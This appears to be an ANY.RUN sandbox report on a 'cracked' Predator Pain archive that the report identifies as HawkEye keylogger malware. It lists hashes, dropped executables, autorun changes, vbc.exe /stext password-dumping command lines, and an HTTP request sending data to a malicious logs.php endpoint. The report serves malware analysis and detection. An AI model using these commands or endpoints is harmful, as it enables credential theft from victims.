File name:

Predator Pain v13 released 3.1.2014 - Cracked.rar

Full analysis: https://app.any.run/tasks/59a7ccb7-4803-4997-a31b-8cf409094025
Verdict: Malicious activity
Threats:

Hawkeye often gets installed in a bundle with other malware. This is a Trojan and keylogger that is used to retrieve private information such as passwords and login credentials. This is an advanced malware that features strong anti-evasion functions.

Malware Trends Tracker     >>>
Analysis date: July 29, 2020, 23:22:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
keylogger
hawkeye
evasion
trojan
stealer
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

4C7B97192C4CC26D61773CF7CD9FF6A0

SHA1:

A63CB5C1E88F5078549E71D9804CCF20F9449653

SHA256:

E6BA3386C042F21DACB6B5D0E09D03660620C62FF82874CEDA695150E9B59B57

SSDEEP:

24576:+CQXE+2T6dOYjCdKlpeWscXqk0+GUzEK95+8whn80+E0OBCxQb:+oZwCdKloWPqkjJEKI0OBCQb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Predator_v14 Cracked.exe (PID: 928)
      • Predator_v13 Cracked.exe (PID: 3912)
      • EBFile_1.exe (PID: 3896)
      • Chrome32.exe (PID: 3432)
      • Predator_v14 Cracked.exe (PID: 3872)
      • Predator_v13 Cracked.exe (PID: 2612)

    • HAWKEYE was detected

      • Predator_v14 Cracked.exe (PID: 928)

    • Changes the autorun value in the registry

      • EBFile_1.exe (PID: 3896)
      • Chrome32.exe (PID: 3432)

    • Actions looks like stealing of personal data

      • vbc.exe (PID: 324)
      • vbc.exe (PID: 3804)

  • SUSPICIOUS

    • Creates files in the user directory

      • EBFile_1.exe (PID: 3896)
      • Predator_v14 Cracked.exe (PID: 928)

    • Checks for external IP

      • Predator_v14 Cracked.exe (PID: 928)

    • Executable content was dropped or overwritten

      • Predator_v14 Cracked.exe (PID: 928)
      • EBFile_1.exe (PID: 3896)
      • Chrome32.exe (PID: 3432)
      • WinRAR.exe (PID: 1772)

    • Starts itself from another location

      • EBFile_1.exe (PID: 3896)

    • Writes to a desktop.ini file (may be used to cloak folders)

      • WinRAR.exe (PID: 1772)

    • Executes scripts

      • Predator_v14 Cracked.exe (PID: 928)

    • Loads DLL from Mozilla Firefox

      • vbc.exe (PID: 3804)

  • INFO

    • Manual execution by user

      • Predator_v14 Cracked.exe (PID: 928)
      • Predator_v13 Cracked.exe (PID: 3912)
      • Predator_v14 Cracked.exe (PID: 3872)
      • Predator_v13 Cracked.exe (PID: 2612)
      • taskmgr.exe (PID: 2160)

    • Dropped object may contain Bitcoin addresses

      • Predator_v14 Cracked.exe (PID: 928)
      • Chrome32.exe (PID: 3432)
      • EBFile_1.exe (PID: 3896)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
10
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winrar.exe predator_v13 cracked.exe #HAWKEYE predator_v14 cracked.exe ebfile_1.exe chrome32.exe vbc.exe predator_v14 cracked.exe predator_v13 cracked.exe vbc.exe taskmgr.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
324C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\admin\AppData\Local\Temp\holdermail.txt"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Predator_v14 Cracked.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual Basic Command Line Compiler
Exit code:
0
Version:
8.0.50727.5420
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
928"C:\Users\admin\Desktop\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v14 Cracked.exe" C:\Users\admin\Desktop\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v14 Cracked.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Microsoft
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\desktop\predator pain v13 released 3.1.2014 - cracked\predator_v14 cracked.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
1772"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Predator Pain v13 released 3.1.2014 - Cracked.rar"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
2160"C:\Windows\system32\taskmgr.exe" /4C:\Windows\system32\taskmgr.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Task Manager
Exit code:
4294967295
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\taskmgr.exe
c:\systemroot\system32\ntdll.dll
2612"C:\Users\admin\Desktop\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v13 Cracked.exe" C:\Users\admin\Desktop\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v13 Cracked.exe
explorer.exe
User:
admin
Company:
Predator Inc.
Integrity Level:
MEDIUM
Description:
Predator Logger
Exit code:
0
Version:
13.0.0.0
Modules
Images
c:\users\admin\desktop\predator pain v13 released 3.1.2014 - cracked\predator_v13 cracked.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
3432"C:\Users\admin\AppData\Local\Google (x86)\Chrome32.exe" C:\Users\admin\AppData\Local\Temp\EBFile_1.exeC:\Users\admin\AppData\Local\Google (x86)\Chrome32.exe
EBFile_1.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Adobe Reader
Exit code:
0
Version:
11.0.10.32
Modules
Images
c:\users\admin\appdata\local\google (x86)\chrome32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
3804C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\admin\AppData\Local\Temp\holderwb.txt"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Predator_v14 Cracked.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual Basic Command Line Compiler
Exit code:
0
Version:
8.0.50727.5420
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
3872"C:\Users\admin\Desktop\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v14 Cracked.exe" C:\Users\admin\Desktop\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v14 Cracked.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Microsoft
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\desktop\predator pain v13 released 3.1.2014 - cracked\predator_v14 cracked.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
3896"C:\Users\admin\AppData\Local\Temp\EBFile_1.exe" C:\Users\admin\AppData\Local\Temp\EBFile_1.exe
Predator_v14 Cracked.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Adobe Reader
Exit code:
0
Version:
11.0.10.32
Modules
Images
c:\users\admin\appdata\local\temp\ebfile_1.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
3912"C:\Users\admin\Desktop\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v13 Cracked.exe" C:\Users\admin\Desktop\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v13 Cracked.exe
explorer.exe
User:
admin
Company:
Predator Inc.
Integrity Level:
MEDIUM
Description:
Predator Logger
Exit code:
0
Version:
13.0.0.0
Modules
Images
c:\users\admin\desktop\predator pain v13 released 3.1.2014 - cracked\predator_v13 cracked.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
Total events
1 362
Read events
1 308
Write events
54
Delete events
0

Modification events

(PID) Process:(1772) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(1772) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(1772) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\132\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(1772) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\Predator Pain v13 released 3.1.2014 - Cracked.rar
(PID) Process:(1772) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(1772) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(1772) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(1772) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(1772) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Operation:writeName:Placement
Value:
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000
(PID) Process:(1772) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\General
Operation:writeName:LastFolder
Value:
C:\Users\admin\AppData\Local\Temp
Executable files
9
Suspicious files
0
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
324vbc.exeC:\Users\admin\AppData\Local\Temp\holdermail.txt
MD5:
SHA256:
3804vbc.exeC:\Users\admin\AppData\Local\Temp\holderwb.txt
MD5:
SHA256:
1772WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa1772.28043\Predator Pain v13 released 3.1.2014 - Cracked\Predator_v14 Cracked.exeexecutable
MD5:
SHA256:
1772WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa1772.28043\Predator Pain v13 released 3.1.2014 - Cracked\desktop.iniini
MD5:
SHA256:
1772WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa1772.28043\Predator Pain v13 released 3.1.2014 - Cracked\Mono.Cecil.dllexecutable
MD5:FD7EA8C171B3958910773B0351997482
SHA256:A6603571C984C2E5C768C146AF4188AFEB3FA825A8D86FC9D7A9419ABD3B549E
1772WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa1772.28043\Predator Pain v13 released 3.1.2014 - Cracked\loader.logtext
MD5:D1DA819FF2A21A4547A842DDD02B8832
SHA256:63F796057F401138489694CB52A5A63F65646A6FE58DD4AA280C3CAB8D8E2F86
1772WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa1772.28043\Predator Pain v13 released 3.1.2014 - Cracked\Pin.exeexecutable
MD5:6D137F98C7E10DC7DE04F9218CC290B1
SHA256:A3B139B466C4CD7DCD23C69FD2341D0F10C6041812E8BEB8C4E3760310ADDE7A
928Predator_v14 Cracked.exeC:\Users\admin\AppData\Local\Temp\EBFile_1.exeexecutable
MD5:
SHA256:
3896EBFile_1.exeC:\Users\admin\AppData\Local\Google (x86)\Chrome32.exeexecutable
MD5:
SHA256:
3432Chrome32.exeC:\Users\admin\AppData\Roaming\Adobe (x86)\AcroRd32.exeexecutable
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
7
DNS requests
6
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
928
Predator_v14 Cracked.exe
GET
301
104.16.154.36:80
http://whatismyipaddress.com/
US
shared
3912
Predator_v13 Cracked.exe
GET
200
199.59.242.153:80
http://ww25.deceptiveengineering.com/path/logs.php?fname=PLogger_v13_Test.txt&data=%5BPLogger%20v.13%5D%20Your%20PHP%20has%20been%20verified,%20you%20may%20delete%20this%20file%20now.&subid1=20200730-0923-189e-bcef-3267f48b9346
US
html
3.93 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
928
Predator_v14 Cracked.exe
104.16.154.36:80
whatismyipaddress.com
Cloudflare Inc
US
shared
928
Predator_v14 Cracked.exe
104.16.154.36:443
whatismyipaddress.com
Cloudflare Inc
US
shared
3912
Predator_v13 Cracked.exe
199.59.242.153:80
ww25.deceptiveengineering.com
Bodis, LLC
US
malicious
928
Predator_v14 Cracked.exe
145.14.144.10:21
files.000webhost.com
Hostinger International Limited
US
malicious
3912
Predator_v13 Cracked.exe
70.32.1.32:80
www.deceptiveengineering.com
GigeNET
US
malicious

DNS requests

Domain
IP
Reputation
whatismyipaddress.com
  • 104.16.154.36
  • 104.16.155.36
shared
files.000webhost.com
  • 145.14.144.10
malicious
www.deceptiveengineering.com
  • 70.32.1.32
malicious
ww25.deceptiveengineering.com
  • 199.59.242.153
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
928
Predator_v14 Cracked.exe
Potential Corporate Privacy Violation
ET POLICY Known External IP Lookup Service Domain in SNI
928
Predator_v14 Cracked.exe
A Network Trojan was detected
SPYWARE [PTsecurity] HawkEye / Predator Pain (IP Chck)
928
Predator_v14 Cracked.exe
Potential Corporate Privacy Violation
ET POLICY Known External IP Lookup Service Domain in SNI
928
Predator_v14 Cracked.exe
Generic Protocol Command Decode
SURICATA Applayer Detect protocol only one direction
928
Predator_v14 Cracked.exe
Generic Protocol Command Decode
SURICATA Applayer Detect protocol only one direction
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Predator Pain v13 released 3.1.2014 - Cracked.rar